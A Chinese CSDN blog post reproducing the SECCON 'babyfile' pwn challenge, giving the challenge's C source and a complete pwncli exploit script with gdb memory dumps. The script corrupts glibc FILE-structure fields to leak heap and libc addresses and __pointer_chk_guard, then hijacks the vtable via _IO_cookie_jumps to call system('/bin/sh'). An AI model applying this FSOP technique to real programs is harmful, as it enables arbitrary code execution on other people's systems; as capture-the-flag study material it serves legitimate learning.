[seccon pwn] babyfile 复现

最新推荐文章于 2024-03-27 10:01:52 发布
最新推荐文章于 2024-03-27 10:01:52 发布
阅读量360 收藏 1
点赞数
分类专栏: CTF pwn 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/127965985
版权

终于找到WP,按着一点点学习IO_file结构

这个题目给了源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static int menu(void);
static int getnline(char *buf, int size);
static int getint(void);

#define write_str(s) write(STDOUT_FILENO, s, sizeof(s)-1)

int main(void){
	FILE *fp;

	alarm(60);

	write_str("Play with FILE structure\n");

	if(!(fp = fopen("/dev/null", "r"))){
		write_str("Open error");
		return -1;
	}
	fp->_wide_data = NULL;

	for(;;){
		switch(menu()){
			case 0:
				goto END;
			case 1:
				fflush(fp);
				break;
			case 2:
				{
					unsigned char ofs;
					write_str("offset: ");
					if((ofs = getint()) & 0x80)
						ofs |= 0x40;
					write_str("value: ");
					((char*)fp)[ofs] = getint();
				}
				break;
		}
		write_str("Done.\n");
	}

END:
	write_str("Bye!");
	_exit(0);
}

static int menu(void){
	write_str("\nMENU\n"
			"1. Flush\n"
			"2. Trick\n"
			"0. Exit\n"
			"> ");

	return getint();
}

static int getnline(char *buf, int size){
	int len;

	if(size <= 0 || (len = read(STDIN_FILENO, buf, size-1)) <= 0)
		return -1;

	if(buf[len-1]=='\n')
		len--;
	buf[len] = '\0';

	return len;
}

static int getint(void){
	char buf[0x10] = {};

	getnline(buf, sizeof(buf));
	return atoi(buf);
}

他先生成了一个IO_file结构在堆里,然后允许修改,但其它地址都没有给出(包含堆地址,只允许按结构的偏移改)。

看了WP学了好多东西

1,先修改IO_jump_t->vtable 这里指向的vtable 给他+8然后作一次flush,他会把堆地址放入到IO结构里,然后再改恢复原状。

#!/usr/bin/env python3
# Date: 2022-10-24 16:33:10
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : py babyfile.py debug ./babyfile -b malloc
#     Remote: py babyfile.py remote ./babyfile ip:port

# debug in Ubuntu 22.04
from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)

def flush():
    sla('> ', '1')

def edit(offset, val):
    sla('> ', '2')
    sla("offset: ", str(offset))
    sla("value: ", str(val))

def change(offset, val):
    val = p64(val)
    for i,v in enumerate(val):
        edit(offset+i, v)

def ROL(v,k):
    return ((v<<k)|(v>>(64-k)))&((1<<64)-1)

#edit vtable A0->A8  
#_IO_buf_base,_IO_buf_end == heap_addr
edit(0xd8, 0xa8)
flush()
'''
gef➤  x/40gx 0x000055bc216812a0
0x55bc216812a0: 0x00000000fbad2488      0x0000000000000000
0x55bc216812b0: 0x0000000000000000      0x0000000000000000
0x55bc216812c0: 0x0000000000000000      0x0000000000000000
0x55bc216812d0: 0x0000000000000000      0x0000000000000000
0x55bc216812e0: 0x0000000000000000      0x0000000000000000
0x55bc216812f0: 0x0000000000000000      0x0000000000000000
0x55bc21681300: 0x0000000000000000      0x00007f01477bb5c0
0x55bc21681310: 0x0000000000000003      0x0000000000000000
0x55bc21681320: 0x0000000000000000      0x000055bc21681380
0x55bc21681330: 0xffffffffffffffff      0x0000000000000000
0x55bc21681340: 0x0000000000000000      0x0000000000000000
0x55bc21681350: 0x0000000000000000      0x0000000000000000
0x55bc21681360: 0x0000000000000000      0x0000000000000000
0x55bc21681370: 0x0000000000000000      0x00007f01477b74a0  <- a8

0x562cde9a02a0: 0x00000000fbad2488      0x0000000000000000
0x562cde9a02b0: 0x0000000000000000      0x0000000000000000
0x562cde9a02c0: 0x0000000000000000      0x0000000000000000
0x562cde9a02d0: 0x0000000000000000      0x0000562cde9a0480  <- heap addr 
0x562cde9a02e0: 0x0000562cde9a2480      0x0000000000000000
0x562cde9a02f0: 0x0000000000000000      0x0000000000000000
0x562cde9a0300: 0x0000000000000000      0x00007ff70f6765c0
0x562cde9a0310: 0x0000000000000003      0x0000000000000000
0x562cde9a0320: 0x0000000000000000      0x0000562cde9a0380
0x562cde9a0330: 0xffffffffffffffff      0x0000000000000000
0x562cde9a0340: 0x0000000000000000      0x0000000000000000
0x562cde9a0350: 0x0000000000000000      0x0000000000000000
0x562cde9a0360: 0x0000000000000000      0x0000000000000000
0x562cde9a0370: 0x0000000000000000      0x00007ff70f6724a8

gef➤  heap chunks
Chunk(addr=0x562cde9a0010, size=0x290, flags=PREV_INUSE)
    [0x0000562cde9a0010     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x562cde9a02a0, size=0x1e0, flags=PREV_INUSE)
    [0x0000562cde9a02a0     88 24 ad fb 00 00 00 00 00 00 00 00 00 00 00 00    .$..............]
Chunk(addr=0x562cde9a0480, size=0x2010, flags=PREV_INUSE)
    [0x0000562cde9a0480     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x562cde9a2490, size=0x1eb80, flags=PREV_INUSE)  ←  top chunk
'''

edit(0xd8, 0xa0) #change back
edit(8*5, 0x40) #_IO_write_base!=_IO_write_ptr
flush()

2,这时候IO_file里就有了好多堆地址指针,第二步就是泄露这个地址。

        先在+14*8处写入文件id,这里要泄露所以写1到标准输出

        然后是+4*8,+5*8处的write_base,write_ptr输入的起止地址

        最后修改+2*8处的IO_read_end让他与write_base相同

        这里泄露的是IO_wfile_jumps地址,根据偏移就能得到libc

edit(8*14, 1) #fileno
edit(8*5, 0x78) #write_ptr
edit(8*4, 0x70) #write_base
edit(8*2, 0x70) #_IO_read_end = write_base
'''
gef➤  x/40gx 0x556def01c2a0
0x556def01c2a0: 0x00000000fbad24a8      0x0000556def01c480
0x556def01c2b0: 0x0000556def01c470      0x0000556def01c480 #2 _IO_read_end
0x556def01c2c0: 0x0000556def01c470      0x0000556def01c478 #4 write_base #5 write_ptr
0x556def01c2d0: 0x0000556def01e480      0x0000556def01c480
0x556def01c2e0: 0x0000556def01e480      0x0000000000000000
0x556def01c2f0: 0x0000000000000000      0x0000000000000000
0x556def01c300: 0x0000000000000000      0x00007f42c711f5c0
0x556def01c310: 0x0000000000000001      0x0000000000000000  #14 fileno
0x556def01c320: 0x0000000000000000      0x0000556def01c380
0x556def01c330: 0xffffffffffffffff      0x0000000000000000
0x556def01c340: 0x0000000000000000      0x0000000000000000
0x556def01c350: 0x0000000000000000      0x0000000000000000
0x556def01c360: 0x0000000000000000      0x0000000000000000
0x556def01c370: 0x0000000000000000      0x00007f42c711b4a0
'''
flush()
lb = recv_current_libc_addr(0x1e8f60)  #0x7fe2b0dd1f60 <_IO_wfile_jumps>
set_current_libc_base_and_log(lb)

3,得到__pointer_chk_guard,由于这里写的值是由__pointer_chk_guard保护的,所以要先得到这个值。这个值与canary在canary值后边,可以在内存里找到。

它的加密方式是与原值异或或循环左移17位。

泄露的方法与前面相同,就是修改+4*8处的write_base,和+5*8处的write_ptr还有+2*8处的IO_read_end

#get __pointer_chk_guard 
#0x7f9762bc55e8: 0xd02162c95479db00 (canary)  0x65643a3a6269cd1b (__pointer_chk_guard)
chk_guard_addr = lb + 0x1f35f0 #remote 0x1f35f0
change(8*5, chk_guard_addr +8) #write_ptr
change(8*4, chk_guard_addr) #write_base
change(8*2, chk_guard_addr) #_IO_read_end = write_base

flush()
chk_guard_val = u64(rn(8))
log_ex(hex(chk_guard_val))

4,最后改IO_jump_t->vtable指向IO_cookie_jumps+0x18然后在+e0,+f0处分别写bin/sh+0x100000000(这里为什么高位整形要加1,师傅也没说,反正以后也只能画瓢,不用多管)和与_pointer_chk_guard加密过的system

system_val = ROL(chk_guard_val^libc.sym.system , 17)
_IO_cookie_jumps = lb + 0x1e8a20
bin_sh = next(libc.search(b'/bin/sh'))
change(0xf0, system_val)
change(0xd8, _IO_cookie_jumps + 0x18)
change(0xe0, bin_sh - 0x100000000) #
flush()

ia()

石氏是时试
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
house of Emma
weixin_46483787的博客
02-08 2099
前言 鸽了好久总算来复现了,由于从libc2.34开始,取消了两个常用的hook,这给我们的攻击带来了很大的困难,于是wjh找到了一种新的攻击方式,这是一种基于一条适用于 GLIBC 2.34 及以下所有版本的 IO_File 调用链进行攻击的手法。 前置知识 (一)largebin attack 见我的另一篇文章:house of pig 攻击手法详解 (二)house of kiwi 当程序没有显示调用exit,也不会通过主函数返回,那么以往我们使用的FSOP就无法进行了,如果此时两个hook也没法利用
2024NKCTF-pwn
03-25
2024NKCTF_pwn
linux .so有什么借口,为什么有些程序需要连接ld-linux.so.x这个库
weixin_29292535的博客
05-13 301
环境:目标系统为armeabi,32bit,linux,gcc4.9,glibc2.20,宿主机器为ubuntu12.04执行readelf -d xxx.so,发现有些是需要连接ld-linux.so.x的,比如libffi.so:$ /disk7/shuyin.wsy/tv/prebuilts/gcc/linux-x86/arm/arm-linux-gnueabi-4.9-glibc-2.20...
探索Pwncli:一款强大的网络渗透测试命令行工具
最新发布
gitblog_00058的博客
03-27 296
探索Pwncli:一款强大的网络渗透测试命令行工具 项目地址:https://gitcode.com/RoderickChan/pwncli 项目简介 Pwncli 是由Roderick Chan开发的一款基于Python的网络渗透测试命令行工具。它旨在简化Web应用安全测试过程,提供一个集成了多种实用功能的一站式解决方案。通过该项目,你可以快速执行常见的漏洞检测、信息收集和利用操作,从而提升你的...
seccon 2022 quals wp
azraelxuemo的博客
11-14 733
seccon 2022 quals wp
setjmp()、longjmp() Linux Exception Handling/Error Handling、no-local goto
weixin_33733810的博客
03-15 115
目录 1. 应用场景 2. Use Case Code Analysis 3. 和setjmp、longjmp有关的glibc and eglibc 2.5, 2.7, 2.13 - Buffer Overflow Vulnerability   1. 应用场景 非局部跳转通常被用于实现将程序控制流转移到错误处理模块中;或者是通过这种非正常的函数返回机制,返回到之前调用的函数中...
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4571
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
[pwn] 3.栈溢出
H4ppyD0g的博客
09-01 282
文章目录栈溢出原理ret2textret2shellcode 栈溢出原理 向栈中某个变量写入的数据长度超过了它预先申请的空间长度,导致超出的部分会覆盖掉栈中其他的数据,从而导致程序不按照预定的功能运行。 ret2text ret2text篡改栈帧上的返回地址为程序中已有的后门函数 题目链接:https://pan.baidu.com/s/1y-zTIm1hWkZQEeZQuemn_Q 提取码:dii9 程序代码 setbuf(stdin,0)是关闭输入缓冲区,setbuf(stdout,0)同理。 在v
PWN 基础环境配置
weixin_51867085的博客
01-17 1377
一些基础 pwn 环境
Linux GLibC Stack Canary Values(转载)
青青的专栏--C/C++ OOA/D Design Pattern
08-30 1108
I was recently been asked by a friend how the Linux’s stack canary values work. After performing a quick online research I wasn’t able to find anything useful to give him. So, here is my writing on ho
“undefined reference to“ 问题汇总及解决方法
热门推荐
qq_36412526的博客
11-06 1万+
“undefined reference to” 问题汇总及解决方法
去除__stack_chk_guard
狂奔的鸡骨架的博客
05-18 2038
-fno-stack-protector
Linux编译x86架构内核出现_stack_chk_guard未定义错误
yanxiangyfg的专栏
07-18 6415
背景android模拟器运行于virtualbox中,而virtualbox运行于x86架构的pc端,所以android及其Linux内核都编译成x86架构。当virtualbox的vt未开启的情况下android系统会出现各种问题,如arm库游戏不能运行,桌面平凡挂死重启。通过查看日志,都奔溃在了#00 pc 000183c6 /system/lib/libc.so (__get_thread
house系2
njh18790816639的博客
09-18 378
这里我们续接上回,接着分析高版本的Glibc利用手法,而高版本的利用手法,大都涉及到了io_file以及虚表这类函数指针等。
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行设置: 1. 克隆pwndocker仓库: ```shell git clone https://github.com/Green-Avocado/pwndocker.git ``` 2. 进入pwndocker目录: ```shell cd pwndocker ``` 3. 运行setup.sh脚本(请勿使用超级用户身份运行): ```shell sudo ./setup.sh ``` 完成上述步骤后,您将获得一个已配置好的Docker容器,其中包含了一些常用的CTF工具和调试器,例如pwndbg。 如果您想要在Docker容器中实现命令和输出分别在两个终端窗口的效果,可以按照以下步骤进行设置: 1. 将您的终端分成两块(例如,在Mac上使用⌘ + d进行垂直分屏)。 2. 在第一个终端中,使用tty命令查看当前终端用于显示连接到当前标准输入的终端设备文件名。通常情况下,第一个终端的设备文件名为/dev/pts/0。 3. 在第一个终端中,编辑pwndbg的配置文件(通常位于~/.gdbinit)。 4. 在配置文件中添加以下内容,并将/dev/pts/1替换为第二个终端的设备文件名: ```shell set context-output /dev/pts/1 ``` 5. 保存并退出配置文件。 完成上述步骤后,您将能够在第一个终端中输入命令,并在第二个终端中查看输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值